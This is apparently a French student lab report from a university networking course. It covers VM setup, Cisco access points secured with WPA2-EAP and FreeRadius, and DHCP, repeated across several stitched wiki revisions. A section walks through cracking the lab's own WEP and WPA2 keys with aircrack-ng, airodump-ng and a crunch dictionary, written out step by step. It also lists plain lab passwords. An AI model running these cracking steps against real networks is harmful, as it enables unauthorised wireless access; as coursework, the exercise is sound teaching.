Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 14, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un groupe :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_VM_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server par lequel l'utilisateur passera pour s'authentifier :

aaa authentication login eap_groupe6 group radius_groupe6 // remplacer groupe6 par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour nous, groupe6="IMA2a5_4fun". [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
authentication open eap eap_groupe6
authentication network-eap eap_groupe6
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7 [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme il y a plusieurs grouoes, il faut créer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun" [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles.

15- Attribuer une ip à la borne
enable
conf t
int bvi1
ip address 10.60.0.100 255.255.255.0
exit
exit

on peut maintenant pinger le routeur: <code> ping 10.60.0.254 </code>, mais le les VM

16-Il faut donc rajouter le gateway
enable
conf t
ip route 0.0.0.0 0.0.0.0 10.60.0.253
exit

maintenant on peut reussir à pinger les VM: <code> ping 193.48.57.166 </code>

=== Mise en place du serveur FreeRadius ===

Installation de freeradius:

apt-get install freeradius

Dans le fichier <code>/etc/freeradius/3.0/users</code> on ajoute la ligne:

nyx Cleartext-Password := "glopglop"

Dans le fichier <code>/etc/freeradius/3.0/mods-enabled/eap</code> on modifie la ligne:

eap{
default_eap_type = peap
}

Dans le fichier <code>/etc/freeradius/3.0//mods-enabled/mschap</code> on décommente les lignes suivantes et modifie

use_mppe = yes
require_encryption = yes
require_strong = yes

et on ajoute la ligne suivante:

with_ntdomain_hack = yes

Dans le fichier <code> /etc/freeradius/3.0/clients.conf </code> rajouter le borne comme un client qui se connectera sur le server radius:

client access-point { // nom attribué au client
ipaddr = 10.60.0.100 //adresse ip de la borne
secret = secret_IMA2a5-4fun //mot secret saisi lors de la configuration de la borne
}

Une fois toutes les confirations terminées, nous alons:
-arrêter le server Freeradius
service freeradius stop
-puis le relancer en mode debug afin de visualiser les reqûetes et logs
freeradius -X

===Mise en place serveur DHCP===

Une fois la configuration des bornes et de FreeRadius finie, nous devons rajouter un serveur DHCP sur la borne Wi-Fi. Ainsi, les utilisateur pourront avoir une adresse IP attribuée.

sur le terminal de confiration cisco:
ip dhcp pool groupe6 /goupe6 = "IMA2a5-4fun"
network 10.60.7.0
ns-server celui_de_polytech
ip dhcp pool IMA2a5-4fun excluded-address 10.60.7.252 10.60.7.254

Ca n'a pas marché sur la borne. On le fait donc sur le routeur.

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

<VirtualHost *:80>
ServerName ima2a5-4fun.site
ServerAlias www.ima2a5-4fun.site
DocumentRoot "/var/www/ima2a5-4fun"
<Directory "/var/www/ima2a5-4fun">
Options +FollowSymLinks
AllowOverride all
Require all granted
</Directory>
ErrorLog /var/log/apache2/error.ima2a5-4fun.site.log
CustomLog /var/log/apache2/access.ima2a5-4fun.site.com.log combined
</VirtualHost>

[https://ima2a5-mol-ish.site https://ima2a5-mol-ish.site __]

TP sysres IMA2a5 2019/2020 G6

2019-11-28T17:05:59Z

Jcabrald : /* Mise en place serveur DHCP */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root, utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Sécurisation Wifi par WPA2-EAP ==
=== Configuration des points d'accès Wi-Fi===

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 14, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un groupe :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_VM_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server par lequel l'utilisateur passera pour s'authentifier :

aaa authentication login eap_groupe6 group radius_groupe6 // remplacer groupe6 par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour nous, groupe6="IMA2a5_4fun". [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
authentication open eap eap_groupe6
authentication network-eap eap_groupe6
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7 [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme il y a plusieurs grouoes, il faut créer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun" [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles.

15- Attribuer une ip à la borne
enable
conf t
int bvi1
ip address 10.60.0.100 255.255.255.0
exit
exit

on peut maintenant pinger le routeur: <code> ping 10.60.0.254 </code>, mais le les VM

16-Il faut donc rajouter le gateway
enable
conf t
ip route 0.0.0.0 0.0.0.0 10.60.0.253
exit

maintenant on peut reussir à pinger les VM: <code> ping 193.48.57.166 </code>

=== Mise en place du serveur FreeRadius ===

Installation de freeradius:

apt-get install freeradius

Dans le fichier <code>/etc/freeradius/3.0/users</code> on ajoute la ligne:

nyx Cleartext-Password := "glopglop"

Dans le fichier <code>/etc/freeradius/3.0/mods-enabled/eap</code> on modifie la ligne:

eap{
default_eap_type = peap
}

Dans le fichier <code>/etc/freeradius/3.0//mods-enabled/mschap</code> on décommente les lignes suivantes et modifie

use_mppe = yes
require_encryption = yes
require_strong = yes

et on ajoute la ligne suivante:

with_ntdomain_hack = yes

Dans le fichier <code> /etc/freeradius/3.0/clients.conf </code> rajouter le borne comme un client qui se connectera sur le server radius:

client access-point { // nom attribué au client
ipaddr = 10.60.0.100 //adresse ip de la borne
secret = secret_IMA2a5-4fun //mot secret saisi lors de la configuration de la borne
}

Une fois toutes les confirations terminées, nous alons:
-arrêter le server Freeradius
service freeradius stop
-puis le relancer en mode debug afin de visualiser les reqûetes et logs
freeradius -X

===Mise en place serveur DHCP===

Une fois la configuration des bornes et de FreeRadius finie, nous devons rajouter un serveur DHCP sur la borne Wi-Fi. Ainsi, les utilisateur pourront avoir une adresse IP attribuée.

sur le terminal de confiration cisco:
ip dhcp pool groupe6 /goupe6 = "IMA2a5-4fun"
network 10.60.7.0
ns-server celui_de_polytech
ip dhcp pool IMA2a5-4fun excluded-address 10.60.7.252 10.60.7.254

Ca n'a pas marché sur la borne. On le fait donc sur le routeur.

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

<VirtualHost *:80>
ServerName ima2a5-4fun.site
ServerAlias www.ima2a5-4fun.site
DocumentRoot "/var/www/ima2a5-4fun"
<Directory "/var/www/ima2a5-4fun">
Options +FollowSymLinks
AllowOverride all
Require all granted
</Directory>
ErrorLog /var/log/apache2/error.ima2a5-4fun.site.log
CustomLog /var/log/apache2/access.ima2a5-4fun.site.com.log combined
</VirtualHost>

TP sysres IMA2a5 2019/2020 G6

2019-11-28T17:05:43Z

Jcabrald : /* Configuration des points d'accès Wi-Fi */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root, utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Sécurisation Wifi par WPA2-EAP ==
=== Configuration des points d'accès Wi-Fi===

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 14, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un groupe :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_VM_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server par lequel l'utilisateur passera pour s'authentifier :

aaa authentication login eap_groupe6 group radius_groupe6 // remplacer groupe6 par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour nous, groupe6="IMA2a5_4fun". [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
authentication open eap eap_groupe6
authentication network-eap eap_groupe6
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7 [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme il y a plusieurs grouoes, il faut créer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun" [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles.

15- Attribuer une ip à la borne
enable
conf t
int bvi1
ip address 10.60.0.100 255.255.255.0
exit
exit

on peut maintenant pinger le routeur: <code> ping 10.60.0.254 </code>, mais le les VM

16-Il faut donc rajouter le gateway
enable
conf t
ip route 0.0.0.0 0.0.0.0 10.60.0.253
exit

maintenant on peut reussir à pinger les VM: <code> ping 193.48.57.166 </code>

=== Mise en place du serveur FreeRadius ===

Installation de freeradius:

apt-get install freeradius

Dans le fichier <code>/etc/freeradius/3.0/users</code> on ajoute la ligne:

nyx Cleartext-Password := "glopglop"

Dans le fichier <code>/etc/freeradius/3.0/mods-enabled/eap</code> on modifie la ligne:

eap{
default_eap_type = peap
}

Dans le fichier <code>/etc/freeradius/3.0//mods-enabled/mschap</code> on décommente les lignes suivantes et modifie

use_mppe = yes
require_encryption = yes
require_strong = yes

et on ajoute la ligne suivante:

with_ntdomain_hack = yes

Dans le fichier <code> /etc/freeradius/3.0/clients.conf </code> rajouter le borne comme un client qui se connectera sur le server radius:

client access-point { // nom attribué au client
ipaddr = 10.60.0.100 //adresse ip de la borne
secret = secret_IMA2a5-4fun //mot secret saisi lors de la configuration de la borne
}

Une fois toutes les confirations terminées, nous alons:
-arrêter le server Freeradius
service freeradius stop
-puis le relancer en mode debug afin de visualiser les reqûetes et logs
freeradius -X

===Mise en place serveur DHCPi===

Une fois la configuration des bornes et de FreeRadius finie, nous devons rajouter un serveur DHCP sur la borne Wi-Fi. Ainsi, les utilisateur pourront avoir une adresse IP attribuée.

sur le terminal de confiration cisco:
ip dhcp pool groupe6 /goupe6 = "IMA2a5-4fun"
network 10.60.7.0
ns-server celui_de_polytech
